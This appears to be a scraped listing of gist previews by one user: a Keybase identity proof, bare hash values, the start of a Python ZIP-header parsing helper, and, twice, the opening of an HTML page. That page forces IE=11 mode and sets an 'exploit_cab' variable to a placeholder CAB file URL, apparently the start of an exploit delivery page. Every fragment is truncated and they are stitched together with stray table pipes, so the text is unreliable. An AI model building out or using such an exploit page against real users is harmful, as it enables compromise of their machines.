I hereby claim:
- I am d4stiny on github.
- I am billdemirkapi (https://keybase.io/billdemirkapi) on keybase.
- I have a public key ASAaxyVyjWbAPJHsCoR1QSRqpR3MiLasx056OGP9LcNnpAo
To claim this, I am signing this object:
3C6F60C412CCB3AADBF09887C82D50A0B1DA250445EB8970D86087C086CDF48C |
5169c2b0b13a9b713b3d388e61eb007672e2377afd53720a61231491a4b627f7 |
I hereby claim:
To claim this, I am signing this object:
DDF218CF99DBF0F21A0C5480331BA07DF4FDB1A6E44E9622B30F0A5B650B9F0E |
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta http-equiv="Expires" content="-1"> | |
<meta http-equiv="X-UA-Compatible" content="IE=11"> | |
</head> | |
<body> | |
<script> | |
var exploit_cab = "[CAB file URL]"; |
import sys | |
import zipfile | |
import random | |
def get_zip_file_header_offset(zip_filename, target_filename): | |
""" | |
Parse the file header offset for a target_filename. | |
:param zip_filename: The name of the zip file to read. | |
:param target_filename: The name of the file to find the header of. |
D779D38405E8828F5CB27C2C3D75867C6A9AA30E0BD003FECF0401BFA6F9C8C7 |
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta http-equiv="Expires" content="-1"> | |
<meta http-equiv="X-UA-Compatible" content="IE=11"> | |
</head> | |
<body> | |
<script> | |
var exploit_cab = "[CAB file URL]"; |
e5285d895cc1200237f9676985df471f4eba9d13f59541b8df774238a188382bc2c7ce6a75d7346f5b0fe940e2ca196b78edde78912e5bd3a4f0e88e8906c7c1 |
38fda53c4d91a2279a300e030f87bd9783d3640ba090bc3a74d049c2e3c5ae2b |